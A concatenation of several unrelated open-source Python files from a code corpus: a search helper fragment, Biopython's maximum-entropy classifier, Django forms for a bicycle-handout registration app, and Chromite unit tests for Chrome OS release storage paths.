return search_open_file(pSearchFile,pSearchStr1,True,LINE_HEAD_COMMENT_STR,IS_SEMICOLON_PARSER,pSearchStr2,FLAG)
else:
result_hit_count_list = search_open_file(pSearchFile,pSearchStr1,False,LINE_HEAD_COMMENT_STR,IS_SEMICOLON_PARSER,"",FLAG)
hit_total_cnt = len(result_hit_count_list)
if hit_total_cnt!= 0 and pSearchStr2 != "":
result_hit_count_list = search_open_file(pSearchFile,pSearchStr2,isFirstMatchExit,LINE_HEAD_COMMENT_STR,IS_SEMICOLON_PARSER,"",FLAG)
return result_hit_count_list
def wrapSearchByFile(param):
try:
return (searchByFile(*param),param[0])
except Exception,e:
raise Exception, '%s , searchTargetFile = %s' % (e,param[0])
def wrapSearchOpenFile(param):
try:
return (search_open_file(*param),param[0])
except Exception,e:
raise Exception, '%s , searchTargetFile = %s' % (e,param[0]) | apache-2.0 | 923,077,001,037,912,300 | 34.650307 | 173 | 0.610188 | false | 3.607886 | false | false | false |
dbmi-pitt/DIKB-Micropublication | scripts/mp-scripts/Bio/MaxEntropy.py | 1 | 9062 | # Copyright 2001 by Jeffrey Chang. All rights reserved.
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""
Maximum Entropy code.
Uses Improved Iterative Scaling:
XXX ref
# XXX need to define terminology
"""
import math
from Numeric import *
from Bio import listfns
# XXX typecodes for Numeric
# XXX multiprocessor
MAX_IIS_ITERATIONS = 10000 # Maximum iterations for IIS.
IIS_CONVERGE = 1E-5 # Convergence criteria for IIS.
MAX_NEWTON_ITERATIONS = 100 # Maximum iterations on Newton's method.
NEWTON_CONVERGE = 1E-10 # Convergence criteria for Newton's method.
class MaxEntropy:
"""Holds information for a Maximum Entropy classifier.
Members:
classes List of the possible classes of data.
alphas List of the weights for each feature.
feature_fns List of the feature functions.
"""
def __init__(self):
self.classes = []
self.alphas = []
self.feature_fns = []
def calculate(me, observation):
"""calculate(me, observation) -> list of log probs
Calculate the log of the probability for each class. me is a
MaxEntropy object that has been trained. observation is a vector
representing the observed data. The return value is a list of
unnormalized log probabilities for each class.
"""
scores = []
for klass in range(len(me.classes)):
lprob = 0.0
for fn, alpha in map(None, me.feature_fns, me.alphas):
lprob += fn(observation, klass) * alpha
scores.append(lprob)
return scores
def classify(me, observation):
"""classify(me, observation) -> class
Classify an observation into a class.
"""
scores = calculate(me, observation)
max_score, klass = scores[0], me.classes[0]
for i in range(1, len(scores)):
if scores[i] > max_score:
max_score, klass = scores[i], me.classes[i]
return klass
def _eval_feature_fn(fn, xs, classes):
"""_eval_feature_fn(fn, xs, classes) -> dict of values
Evaluate a feature function on every instance of the training set
and class. fn is a callback function that takes two parameters: a
training instance and a class. Return a dictionary of (training
set index, class index) -> non-zero value. Values of 0 are not
stored in the dictionary.
"""
values = {}
for i in range(len(xs)):
for j in range(len(classes)):
f = fn(xs[i], classes[j])
if f != 0:
values[(i, j)] = f
return values
def _calc_empirical_expects(xs, ys, classes, features):
"""_calc_empirical_expects(xs, ys, classes, features) -> list of expectations
Calculate the expectation of each function from the data. This is
the constraint for the maximum entropy distribution. Return a
list of expectations, parallel to the list of features.
"""
# E[f_i] = SUM_x,y P(x, y) f(x, y)
# = 1/N f(x, y)
class2index = listfns.itemindex(classes)
ys_i = [class2index[y] for y in ys]
expect = []
N = len(xs)
for feature in features:
s = 0
for i in range(N):
s += feature.get((i, ys_i[i]), 0)
expect.append(float(s) / N)
return expect
def _calc_model_expects(xs, classes, features, alphas):
"""_calc_model_expects(xs, classes, features, alphas) -> list of expectations.
Calculate the expectation of each feature from the model. This is
not used in maximum entropy training, but provides a good function
for debugging.
"""
# SUM_X P(x) SUM_Y P(Y|X) F(X, Y)
# = 1/N SUM_X SUM_Y P(Y|X) F(X, Y)
p_yx = _calc_p_class_given_x(xs, classes, features, alphas)
expects = []
for feature in features:
sum = 0.0
for (i, j), f in feature.items():
sum += p_yx[i][j] * f
expects.append(sum/len(xs))
return expects
def _calc_p_class_given_x(xs, classes, features, alphas):
"""_calc_p_class_given_x(xs, classes, features, alphas) -> matrix
Calculate P(y|x), where y is the class and x is an instance from
the training set. Return a XSxCLASSES matrix of probabilities.
"""
prob_yx = zeros((len(xs), len(classes)), Float32)
# Calculate log P(y, x).
for feature, alpha in map(None, features, alphas):
for (x, y), f in feature.items():
prob_yx[x][y] += alpha * f
# Take an exponent to get P(y, x)
prob_yx = exp(prob_yx)
# Divide out the probability over each class, so we get P(y|x).
for i in range(len(xs)):
z = sum(prob_yx[i])
prob_yx[i] = prob_yx[i] / z
#prob_yx = []
#for i in range(len(xs)):
# z = 0.0 # Normalization factor for this x, over all classes.
# probs = [0.0] * len(classes)
# for j in range(len(classes)):
# log_p = 0.0 # log of the probability of f(x, y)
# for k in range(len(features)):
# log_p += alphas[k] * features[k].get((i, j), 0.0)
# probs[j] = math.exp(log_p)
# z += probs[j]
# # Normalize the probabilities for this x.
# probs = map(lambda x, z=z: x/z, probs)
# prob_yx.append(probs)
return prob_yx
def _calc_f_sharp(N, nclasses, features):
"""_calc_f_sharp(N, nclasses, features) -> matrix of f sharp values."""
# f#(x, y) = SUM_i feature(x, y)
f_sharp = zeros((N, nclasses))
for feature in features:
for (i, j), f in feature.items():
f_sharp[i][j] += f
return f_sharp
def _iis_solve_delta(N, feature, f_sharp, empirical, prob_yx):
# Solve delta using Newton's method for:
# SUM_x P(x) * SUM_c P(c|x) f_i(x, c) e^[delta_i * f#(x, c)] = 0
delta = 0.0
iters = 0
while iters < MAX_NEWTON_ITERATIONS: # iterate for Newton's method
f_newton = df_newton = 0.0 # evaluate the function and derivative
for (i, j), f in feature.items():
prod = prob_yx[i][j] * f * math.exp(delta * f_sharp[i][j])
f_newton += prod
df_newton += prod * f_sharp[i][j]
f_newton, df_newton = empirical - f_newton / N, -df_newton / N
ratio = f_newton / df_newton
delta -= ratio
if math.fabs(ratio) < NEWTON_CONVERGE: # converged
break
iters = iters + 1
else:
raise "Newton's method did not converge"
return delta
def _train_iis(xs, classes, features, f_sharp, alphas, e_empirical):
# Do one iteration of hill climbing to find better alphas.
# This is a good function to parallelize.
# Pre-calculate P(y|x)
p_yx = _calc_p_class_given_x(xs, classes, features, alphas)
N = len(xs)
newalphas = alphas[:]
for i in range(len(alphas)):
delta = _iis_solve_delta(N, features[i], f_sharp, e_empirical[i], p_yx)
newalphas[i] += delta
return newalphas
def train(training_set, results, feature_fns, update_fn=None):
"""train(training_set, results, feature_fns[, update_fn]) -> MaxEntropy object
Train a maximum entropy classifier on a training set.
training_set is a list of observations. results is a list of the
class assignments for each observation. feature_fns is a list of
the features. These are callback functions that take an
observation and class and return a 1 or 0. update_fn is a
callback function that's called at each training iteration. It is
passed a MaxEntropy object that encapsulates the current state of
the training.
"""
if not len(training_set):
raise ValueError, "No data in the training set."
if len(training_set) != len(results):
raise ValueError, "training_set and results should be parallel lists."
# Rename variables for convenience.
xs, ys = training_set, results
# Get a list of all the classes that need to be trained.
classes = listfns.items(results)
classes.sort()
# Cache values for all features.
features = [_eval_feature_fn(fn, training_set, classes)
for fn in feature_fns]
# Cache values for f#.
f_sharp = _calc_f_sharp(len(training_set), len(classes), features)
# Pre-calculate the empirical expectations of the features.
e_empirical = _calc_empirical_expects(xs, ys, classes, features)
# Now train the alpha parameters to weigh each feature.
alphas = [0.0] * len(features)
iters = 0
while iters < MAX_IIS_ITERATIONS:
nalphas = _train_iis(xs, classes, features, f_sharp,
alphas, e_empirical)
diff = map(lambda x, y: math.fabs(x-y), alphas, nalphas)
diff = reduce(lambda x, y: x+y, diff, 0)
alphas = nalphas
me = MaxEntropy()
me.alphas, me.classes, me.feature_fns = alphas, classes, feature_fns
if update_fn is not None:
update_fn(me)
if diff < IIS_CONVERGE: # converged
break
else:
raise "IIS did not converge"
return me
| apache-2.0 | -3,662,323,723,767,325,700 | 33.067669 | 82 | 0.614875 | false | 3.420914 | false | false | false |
michaelbratsch/bwb | staff/forms.py | 2 | 8911 | from crispy_forms.helper import FormHelper
from crispy_forms.layout import Submit, Layout, Field, Div
from django import forms
from django.core.exceptions import ValidationError
from django.shortcuts import get_object_or_404
from django.utils.formats import date_format
from django.utils.translation import ugettext_lazy
from register.forms import SelectDateOfBirthWidget, MULTIPLE_REGISTRATION_ERROR
from register.models import Bicycle, Candidate
class CreateCandidateForm(forms.ModelForm):
class Meta:
model = Candidate
fields = ('first_name', 'last_name', 'date_of_birth')
labels = {'first_name': ugettext_lazy('First name'),
'last_name': ugettext_lazy('Last name'),
'date_of_birth': ugettext_lazy('Date of birth')}
widgets = {'date_of_birth': SelectDateOfBirthWidget}
def __init__(self, *args, **kwargs):
super(CreateCandidateForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.layout = Layout(Div(Div(Field('first_name'),
Field('last_name'),
Field('date_of_birth'),
css_class="col-xs-12 col-md-8"),
css_class="form-group row"))
self.helper.add_input(Submit('submit', 'Submit',
css_class='col-xs-3 btn-info'))
def clean(self):
cleaned_data = super(CreateCandidateForm, self).clean()
first_name = cleaned_data.get('first_name')
last_name = cleaned_data.get('last_name')
date_of_birth = cleaned_data.get('date_of_birth')
if Candidate.get_matching(first_name=first_name,
last_name=last_name,
date_of_birth=date_of_birth):
raise ValidationError(MULTIPLE_REGISTRATION_ERROR)
return cleaned_data
def get_hidden_field(name, var):
def trunk(var):
if var:
return var
return ""
return [Field(name, type='hidden', value=trunk(var))]
def get_hidden_fields(candidate_id, event_id, bicycle_id):
return (get_hidden_field('candidate_id', candidate_id) +
get_hidden_field('event_id', event_id) +
get_hidden_field('bicycle_id', bicycle_id))
class DeleteCandidateForm(forms.Form):
event_id = forms.IntegerField(min_value=0, required=False)
bicycle_id = forms.IntegerField(min_value=0, required=False)
candidate_id = forms.IntegerField(min_value=0)
def __init__(self, candidate_id=None, event_id=None, bicycle_id=None,
*args, **kwargs):
super(DeleteCandidateForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.layout = Layout(*get_hidden_fields(
candidate_id, event_id, bicycle_id))
self.helper.add_input(Submit('submit', 'Delete Candidate',
css_class='col-xs-3 btn-info'))
class InviteCandidateForm(forms.Form):
event_id = forms.IntegerField(min_value=0, required=False)
candidate_id = forms.IntegerField(min_value=0)
invitation_event_id = forms.IntegerField(min_value=0)
def __init__(self, candidate_id=None, event_id=None,
bicycle_id=None, # pylint: disable=unused-argument
*args, **kwargs):
super(InviteCandidateForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
if candidate_id:
candidate = get_object_or_404(Candidate, id=candidate_id)
event_choices = [(event.id, date_format(event.due_date,
'DATETIME_FORMAT'))
for event in candidate.events_not_invited_to]
self.fields['invitation_event_id'] = forms.ChoiceField(
choices=event_choices)
layout = [Field('invitation_event_id')]
layout += get_hidden_field('candidate_id', candidate_id)
layout += get_hidden_field('event_id', event_id)
self.helper.layout = Layout(*layout)
self.helper.form_show_labels = False
self.helper.add_input(Submit('submit', 'Submit',
css_class='col-xs-3 btn-info'))
class ModifyCandidateForm(forms.ModelForm):
event_id = forms.IntegerField(min_value=0, required=False)
bicycle_id = forms.IntegerField(min_value=0, required=False)
candidate_id = forms.IntegerField(min_value=0)
class Meta:
model = Candidate
fields = ('first_name', 'last_name', 'date_of_birth',
'event_id', 'bicycle_id', 'candidate_id')
labels = {'first_name': ugettext_lazy('First name'),
'last_name': ugettext_lazy('Last name'),
'date_of_birth': ugettext_lazy('Date of birth')}
widgets = {'date_of_birth': SelectDateOfBirthWidget}
def __init__(self, candidate_id=None, event_id=None, bicycle_id=None,
*args, **kwargs):
super(ModifyCandidateForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
if candidate_id:
candidate = get_object_or_404(Candidate, id=candidate_id)
self.initial = {'first_name': candidate.first_name,
'last_name': candidate.last_name,
'date_of_birth': candidate.date_of_birth}
layout = [Layout(Div(Div(Field('first_name'),
Field('last_name'),
Field('date_of_birth'),
css_class="col-xs-12 col-md-8"),
css_class="form-group row"))]
layout += get_hidden_fields(candidate_id, event_id, bicycle_id)
self.helper.layout = Layout(*layout)
self.helper.add_input(Submit('submit', 'Submit',
css_class='col-xs-3 btn-info'))
def clean(self):
cleaned_data = super(ModifyCandidateForm, self).clean()
first_name = cleaned_data.get('first_name')
last_name = cleaned_data.get('last_name')
date_of_birth = cleaned_data.get('date_of_birth')
candidate_id = cleaned_data['candidate_id']
if Candidate.get_matching(
first_name=first_name,
last_name=last_name,
date_of_birth=date_of_birth).exclude(id=candidate_id):
raise ValidationError(MULTIPLE_REGISTRATION_ERROR)
return cleaned_data
class RefundForm(forms.Form):
event_id = forms.IntegerField(min_value=0, required=False)
bicycle_id = forms.IntegerField(min_value=0, required=False)
candidate_id = forms.IntegerField(min_value=0)
def __init__(self, candidate_id=None, event_id=None, bicycle_id=None,
*args, **kwargs):
super(RefundForm, self).__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.layout = Layout(*get_hidden_fields(
candidate_id, event_id, bicycle_id))
self.helper.add_input(Submit('submit', 'Refund bicycle',
css_class='col-xs-3 btn-info'))
class HandoverForm(forms.ModelForm):
event_id = forms.IntegerField(min_value=0, required=False)
bicycle_id = forms.IntegerField(min_value=0, required=False)
candidate_id = forms.IntegerField(min_value=0)
class Meta:
model = Bicycle
fields = ['bicycle_number', 'general_remarks', 'lock_combination',
'color', 'brand', 'event_id', 'candidate_id', 'bicycle_id']
def __init__(self, candidate_id=None, event_id=None, bicycle_id=None,
*args, **kwargs):
super(HandoverForm, self).__init__(*args, **kwargs)
self.fields['general_remarks'].required = False
self.helper = FormHelper()
self.helper.form_method = 'post'
layout = [Field('bicycle_number'),
Field('lock_combination'),
Field('color'),
Field('brand')]
layout += get_hidden_fields(candidate_id, event_id, bicycle_id)
layout += ['general_remarks']
self.helper.layout = Layout(*layout)
self.helper.add_input(Submit('submit', 'Submit',
css_class='col-xs-3 btn-info'))
class EventForm(forms.Form):
due_date = forms.DateTimeField(input_formats=['%d.%m.%Y %H:%M',
'%m/%d/%Y %I:%M %p'])
class InviteForm(forms.Form):
event_id = forms.IntegerField(min_value=0)
choice_1 = forms.IntegerField(min_value=0)
choice_2 = forms.IntegerField(min_value=0)
choice_3 = forms.IntegerField(min_value=0)
choice_4 = forms.IntegerField(min_value=0)
| gpl-3.0 | -8,928,223,286,084,313,000 | 37.244635 | 79 | 0.574683 | false | 3.847582 | false | false | false |
endlessm/chromium-browser | third_party/chromite/lib/paygen/gspaths_unittest.py | 1 | 24292 | # -*- coding: utf-8 -*-
# Copyright (c) 2012 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Test gspaths library."""
from __future__ import print_function
from chromite.lib import cros_test_lib
from chromite.lib.paygen import gspaths
class GsPathsDataTest(cros_test_lib.TestCase):
"""Tests for structs defined in GsPaths."""
def testBuild(self):
default_input = {
'channel': 'foo-channel',
'board': 'board-name',
'version': '1.2.3',
}
default_expected = {
'bucket': None,
'channel': 'foo-channel',
'board': 'board-name',
'version': '1.2.3',
'uri': None,
}
expected_str = ("Build definition (board='board-name',"
" version='1.2.3', channel='foo-channel')")
build = gspaths.Build(default_input)
self.assertEqual(build, default_expected)
self.assertEqual(expected_str, str(build))
class GsPathsChromeosReleasesTest(cros_test_lib.TestCase):
"""Tests for gspaths.ChromeosReleases."""
# Standard Chrome OS releases names.
_CHROMEOS_RELEASES_BUCKET = 'chromeos-releases'
# Google Storage path, image and payload name base templates.
_GS_BUILD_PATH_TEMPLATE = 'gs://%(bucket)s/%(channel)s/%(board)s/%(version)s'
_IMAGE_NAME_TEMPLATE = (
'chromeos_%(image_version)s_%(board)s_%(signed_image_type)s_'
'%(image_channel)s_%(key)s.bin')
_UNSIGNED_IMAGE_ARCHIVE_NAME_TEMPLATE = (
'ChromeOS-%(unsigned_image_type)s-%(milestone)s-%(image_version)s-'
'%(board)s.tar.xz')
_FULL_PAYLOAD_NAME_TEMPLATE = (
'chromeos_%(image_version)s_%(board)s_%(image_channel)s_full_%(key)s.bin-'
'%(random_str)s.signed')
_DELTA_PAYLOAD_NAME_TEMPLATE = (
'chromeos_%(src_version)s-%(image_version)s_%(board)s_%(image_channel)s_'
'delta_%(key)s.bin-%(random_str)s.signed')
_FULL_DLC_PAYLOAD_NAME_TEMPLATE = (
'dlc_%(dlc_id)s_%(dlc_package)s_%(image_version)s_%(board)s_'
'%(image_channel)s_full.bin-%(random_str)s.signed')
_UNSIGNED_FULL_PAYLOAD_NAME_TEMPLATE = (
'chromeos_%(image_version)s_%(board)s_%(image_channel)s_full_'
'%(unsigned_image_type)s.bin-%(random_str)s')
_UNSIGNED_DELTA_PAYLOAD_NAME_TEMPLATE = (
'chromeos_%(src_version)s-%(image_version)s_%(board)s_%(image_channel)s_'
'delta_%(unsigned_image_type)s.bin-%(random_str)s')
# Compound templates.
_GS_IMAGE_PATH_TEMPLATE = '/'.join(
(_GS_BUILD_PATH_TEMPLATE, _IMAGE_NAME_TEMPLATE))
_GS_UNSIGNED_IMAGE_ARCHIVE_PATH_TEMPLATE = '/'.join(
(_GS_BUILD_PATH_TEMPLATE, _UNSIGNED_IMAGE_ARCHIVE_NAME_TEMPLATE))
_GS_PAYLOADS_PATH_TEMPLATE = '/'.join((_GS_BUILD_PATH_TEMPLATE, 'payloads'))
_GS_PAYLOADS_SIGNING_PATH_TEMPLATE = '/'.join((_GS_BUILD_PATH_TEMPLATE,
'payloads', 'signing'))
_GS_FULL_PAYLOAD_PATH_TEMPLATE = '/'.join(
(_GS_PAYLOADS_PATH_TEMPLATE, _FULL_PAYLOAD_NAME_TEMPLATE))
_GS_DELTA_PAYLOAD_PATH_TEMPLATE = '/'.join(
(_GS_PAYLOADS_PATH_TEMPLATE, _DELTA_PAYLOAD_NAME_TEMPLATE))
_GS_FULL_DLC_PAYLOAD_PATH_TEMPLATE = '/'.join(
(_GS_PAYLOADS_PATH_TEMPLATE, 'dlc', '%(dlc_id)s', '%(dlc_package)s',
_FULL_DLC_PAYLOAD_NAME_TEMPLATE))
def setUp(self):
# Shared attributes (signed + unsigned images).
self.bucket = 'crt'
self.channel = 'foo-channel'
self.board = 'board-name'
self.version = '1.2.3'
self.build = gspaths.Build(bucket=self.bucket, channel=self.channel,
board=self.board, version=self.version)
self.release_build = gspaths.Build(bucket=self._CHROMEOS_RELEASES_BUCKET,
channel=self.channel, board=self.board,
version=self.version)
# Attributes for DLC.
self.dlc_id = 'dummy-dlc'
self.dlc_package = 'dummy-package'
# Signed image attributes.
self.key = 'mp-v3'
self.signed_image_type = 'base'
# Unsigned (test) image attributes.
self.milestone = 'R12'
self.unsigned_image_type = 'test'
# Attributes used for payload testing.
self.src_version = '1.1.1'
self.random_str = '1234567890'
self.src_build = gspaths.Build(bucket=self.bucket, channel=self.channel,
board=self.board, version=self.src_version)
# Dictionaries for populating templates.
self.image_attrs = dict(
bucket=self.bucket,
channel=self.channel,
image_channel=self.channel,
board=self.board,
version=self.version,
image_version=self.version,
key=self.key,
signed_image_type=self.signed_image_type)
self.unsigned_image_archive_attrs = dict(
bucket=self.bucket,
channel=self.channel,
image_channel=self.channel,
board=self.board,
version=self.version,
image_version=self.version,
milestone=self.milestone,
unsigned_image_type=self.unsigned_image_type)
self.all_attrs = dict(self.image_attrs,
src_version=self.src_version,
random_str=self.random_str,
**self.unsigned_image_archive_attrs)
def _Populate(self, template, **kwargs):
"""Populates a template string with override attributes.
This will use the default test attributes to populate a given string
template. It will further override default field values with the values
provided by the optional named arguments.
Args:
template: a string with named substitution fields
kwargs: named attributes to override the defaults
"""
attrs = dict(self.all_attrs, **kwargs)
return template % attrs
def _PopulateGsPath(self, base_path, suffix=None, **kwargs):
"""Populates a Google Storage path template w/ optional suffix.
Args:
base_path: a path string template with named substitution fields
suffix: a path suffix to append to the given base path
kwargs: named attributes to override the defaults
"""
template = base_path
if suffix:
template += '/' + suffix
return self._Populate(template, **kwargs)
def testBuildUri(self):
self.assertEqual(
gspaths.ChromeosReleases.BuildUri(self.build),
self._PopulateGsPath(self._GS_BUILD_PATH_TEMPLATE))
def testBuildPayloadsUri(self):
self.assertEqual(
gspaths.ChromeosReleases.BuildPayloadsUri(self.build),
self._PopulateGsPath(self._GS_PAYLOADS_PATH_TEMPLATE))
def testBuildPayloadsSigningUri(self):
self.assertEqual(
gspaths.ChromeosReleases.BuildPayloadsSigningUri(self.build),
self._PopulateGsPath(self._GS_PAYLOADS_SIGNING_PATH_TEMPLATE))
self.assertEqual(
gspaths.ChromeosReleases.BuildPayloadsFlagUri(
self.build, gspaths.ChromeosReleases.LOCK),
self._PopulateGsPath(self._GS_PAYLOADS_PATH_TEMPLATE,
suffix='LOCK_flag'))
def testImageName(self):
self.assertEqual(
gspaths.ChromeosReleases.ImageName(self.channel,
self.board,
self.version,
self.key,
self.signed_image_type),
self._Populate(self._IMAGE_NAME_TEMPLATE))
def testDLCImageName(self):
self.assertEqual(gspaths.ChromeosReleases.DLCImageName(), 'dlc.img')
def testUnsignedImageArchiveName(self):
self.assertEqual(
gspaths.ChromeosReleases.UnsignedImageArchiveName(
self.board,
self.version,
self.milestone,
self.unsigned_image_type),
self._Populate(self._UNSIGNED_IMAGE_ARCHIVE_NAME_TEMPLATE))
def testImageUri(self):
self.assertEqual(
gspaths.ChromeosReleases.ImageUri(self.build, self.key,
self.signed_image_type),
self._Populate(self._GS_IMAGE_PATH_TEMPLATE))
def testUnsignedImageUri(self):
self.assertEqual(
gspaths.ChromeosReleases.UnsignedImageUri(self.build, self.milestone,
self.unsigned_image_type),
self._Populate(self._GS_UNSIGNED_IMAGE_ARCHIVE_PATH_TEMPLATE))
@staticmethod
def _IncrementVersion(version, inc_amount=1):
version_part = version.rpartition('.')
return '.'.join((version_part[0], str(int(version_part[2]) + inc_amount)))
def testParseImageUri(self):
npo_version = self._IncrementVersion(self.version)
npo_channel = 'nplusone-channel'
basic_dict = dict(self.image_attrs)
npo_dict = dict(self.image_attrs,
bucket=self._CHROMEOS_RELEASES_BUCKET,
image_version=npo_version,
image_channel=npo_channel)
basic_dict['uri'] = uri_basic = self._GS_IMAGE_PATH_TEMPLATE % basic_dict
npo_dict['uri'] = uri_npo = self._GS_IMAGE_PATH_TEMPLATE % npo_dict
expected_basic = gspaths.Image(build=self.build,
image_type=self.signed_image_type,
key=self.key,
uri=uri_basic)
expected_basic_str = gspaths.ChromeosReleases.ImageName(
expected_basic.build.channel, expected_basic.build.board,
expected_basic.build.version, expected_basic.key,
expected_basic.image_type)
expected_npo = gspaths.Image(build=self.release_build,
key=self.key,
image_type=self.signed_image_type,
image_channel=npo_channel,
image_version=npo_version,
uri=uri_npo)
expected_npo_str = gspaths.ChromeosReleases.ImageName(
expected_npo.image_channel, expected_npo.build.board,
expected_npo.image_version, expected_npo.key, expected_npo.image_type)
basic_image = gspaths.ChromeosReleases.ParseImageUri(uri_basic)
self.assertEqual(basic_image, expected_basic)
self.assertEqual(str(basic_image), expected_basic_str)
npo_image = gspaths.ChromeosReleases.ParseImageUri(uri_npo)
self.assertEqual(npo_image, expected_npo)
self.assertEqual(str(npo_image), expected_npo_str)
signer_output = ('gs://chromeos-releases/dev-channel/link/4537.7.0/'
'chromeos_4537.7.1_link_recovery_nplusone-channel_'
'mp-v4.bin.1.payload.hash.update_signer.signed.bin')
bad_image = gspaths.ChromeosReleases.ParseImageUri(signer_output)
self.assertEqual(bad_image, None)
def testParseDLCImageUri(self):
image_uri = ('gs://chromeos-releases/foo-channel/board-name/1.2.3/dlc/'
'%s/%s/%s') % (self.dlc_id, self.dlc_package,
gspaths.ChromeosReleases.DLCImageName())
dlc_image = gspaths.ChromeosReleases.ParseDLCImageUri(image_uri)
expected_dlc_image = gspaths.DLCImage(
build=self.release_build, key=None, uri=image_uri,
dlc_id=self.dlc_id, dlc_package=self.dlc_package,
dlc_image=gspaths.ChromeosReleases.DLCImageName())
self.assertEqual(dlc_image, expected_dlc_image)
def testParseUnsignedImageUri(self):
attr_dict = dict(self.unsigned_image_archive_attrs)
attr_dict['uri'] = uri = (
self._GS_UNSIGNED_IMAGE_ARCHIVE_PATH_TEMPLATE % attr_dict)
expected = gspaths.UnsignedImageArchive(build=self.build,
milestone=self.milestone,
image_type=self.unsigned_image_type,
uri=uri)
expected_str = gspaths.ChromeosReleases.UnsignedImageArchiveName(
expected.build.board, expected.build.version, expected.milestone,
expected.image_type)
image = gspaths.ChromeosReleases.ParseUnsignedImageUri(uri)
self.assertEqual(image, expected)
self.assertEqual(str(image), expected_str)
def testPayloadNamePreset(self):
full = gspaths.ChromeosReleases.PayloadName(channel=self.channel,
board=self.board,
version=self.version,
key=self.key,
random_str=self.random_str)
delta = gspaths.ChromeosReleases.PayloadName(channel=self.channel,
board=self.board,
version=self.version,
key=self.key,
src_version=self.src_version,
random_str=self.random_str)
full_unsigned = gspaths.ChromeosReleases.PayloadName(
channel=self.channel,
board=self.board,
version=self.version,
random_str=self.random_str,
unsigned_image_type=self.unsigned_image_type)
delta_unsigned = gspaths.ChromeosReleases.PayloadName(
channel=self.channel,
board=self.board,
version=self.version,
src_version=self.src_version,
random_str=self.random_str,
unsigned_image_type=self.unsigned_image_type)
self.assertEqual(full, self._Populate(self._FULL_PAYLOAD_NAME_TEMPLATE))
self.assertEqual(delta, self._Populate(self._DELTA_PAYLOAD_NAME_TEMPLATE))
self.assertEqual(full_unsigned,
self._Populate(self._UNSIGNED_FULL_PAYLOAD_NAME_TEMPLATE))
self.assertEqual(delta_unsigned,
self._Populate(self._UNSIGNED_DELTA_PAYLOAD_NAME_TEMPLATE))
def testPayloadNameRandom(self):
full = gspaths.ChromeosReleases.PayloadName(channel=self.channel,
board=self.board,
version=self.version,
key=self.key)
delta = gspaths.ChromeosReleases.PayloadName(channel=self.channel,
board=self.board,
version=self.version,
key=self.key,
src_version=self.src_version)
# Isolate the actual random string, transplant it in the reference template.
full_random_str = full.split('-')[-1].partition('.')[0]
self.assertEqual(
full,
self._Populate(self._FULL_PAYLOAD_NAME_TEMPLATE,
random_str=full_random_str))
delta_random_str = delta.split('-')[-1].partition('.')[0]
self.assertEqual(
delta,
self._Populate(self._DELTA_PAYLOAD_NAME_TEMPLATE,
random_str=delta_random_str))
def testPayloadDLC(self):
full = gspaths.ChromeosReleases.DLCPayloadName(
channel=self.channel,
board=self.board,
version=self.version,
random_str=self.random_str,
dlc_id=self.dlc_id,
dlc_package=self.dlc_package)
self.assertEqual(full, self._Populate(self._FULL_DLC_PAYLOAD_NAME_TEMPLATE,
dlc_id=self.dlc_id,
dlc_package=self.dlc_package,
random_str=self.random_str))
def testPayloadUri(self):
test_random_channel = 'test_random_channel'
test_max_version = '4.5.6'
test_min_version = '0.12.1.0'
min_full = gspaths.ChromeosReleases.PayloadUri(
build=self.build, random_str=self.random_str, key=self.key)
self.assertEqual(
min_full,
self._Populate(self._GS_FULL_PAYLOAD_PATH_TEMPLATE))
max_full = gspaths.ChromeosReleases.PayloadUri(
build=self.build, random_str=self.random_str, key=self.key,
image_channel=test_random_channel, image_version=test_max_version)
self.assertEqual(
max_full,
self._Populate(self._GS_FULL_PAYLOAD_PATH_TEMPLATE,
image_channel=test_random_channel,
image_version=test_max_version))
min_delta = gspaths.ChromeosReleases.PayloadUri(
build=self.build, random_str=self.random_str, key=self.key,
src_version=test_min_version)
self.assertEqual(
min_delta,
self._Populate(self._GS_DELTA_PAYLOAD_PATH_TEMPLATE,
src_version=test_min_version))
max_delta = gspaths.ChromeosReleases.PayloadUri(
build=self.build, random_str=self.random_str, key=self.key,
image_channel=test_random_channel, image_version=test_max_version,
src_version=test_min_version)
self.assertEqual(
max_delta,
self._Populate(self._GS_DELTA_PAYLOAD_PATH_TEMPLATE,
src_version=test_min_version,
image_version=test_max_version,
image_channel=test_random_channel))
dlc_full = gspaths.ChromeosReleases.DLCPayloadUri(
build=self.build, random_str=self.random_str, dlc_id=self.dlc_id,
dlc_package=self.dlc_package, image_channel=test_random_channel,
image_version=test_max_version)
self.assertEqual(
dlc_full,
self._Populate(self._GS_FULL_DLC_PAYLOAD_PATH_TEMPLATE,
src_version=test_min_version,
image_version=test_max_version,
image_channel=test_random_channel,
dlc_id=self.dlc_id,
dlc_package=self.dlc_package))
def testParsePayloadUri(self):
"""Test gsutils.ChromeosReleases.ParsePayloadUri()."""
image_version = '1.2.4'
full_uri = self._Populate(self._GS_FULL_PAYLOAD_PATH_TEMPLATE)
delta_uri = self._Populate(self._GS_DELTA_PAYLOAD_PATH_TEMPLATE)
max_full_uri = self._Populate(self._GS_FULL_PAYLOAD_PATH_TEMPLATE,
image_channel='image-channel',
image_version=image_version)
max_delta_uri = self._Populate(self._GS_DELTA_PAYLOAD_PATH_TEMPLATE,
image_channel='image-channel',
image_version=image_version)
self.assertDictEqual(
gspaths.ChromeosReleases.ParsePayloadUri(full_uri),
{
'tgt_image': gspaths.Image(build=self.build, key=self.key),
'src_image': None,
'build': self.build,
'uri': full_uri,
'exists': False
})
self.assertDictEqual(
gspaths.ChromeosReleases.ParsePayloadUri(delta_uri),
{
'src_image': gspaths.Image(build=self.src_build),
'tgt_image': gspaths.Image(build=self.build, key=self.key),
'build': self.build,
'uri': delta_uri,
'exists': False
})
self.assertDictEqual(
gspaths.ChromeosReleases.ParsePayloadUri(max_full_uri),
{
'tgt_image': gspaths.Image(build=self.build,
key=self.key,
image_version=image_version,
image_channel='image-channel'),
'src_image': None,
'build': self.build,
'uri': max_full_uri,
'exists': False
})
self.assertDictEqual(
gspaths.ChromeosReleases.ParsePayloadUri(max_delta_uri),
{
'src_image': gspaths.Image(build=self.src_build),
'tgt_image': gspaths.Image(build=self.build,
key=self.key,
image_version=image_version,
image_channel='image-channel'),
'build': self.build,
'uri': max_delta_uri,
'exists': False
})
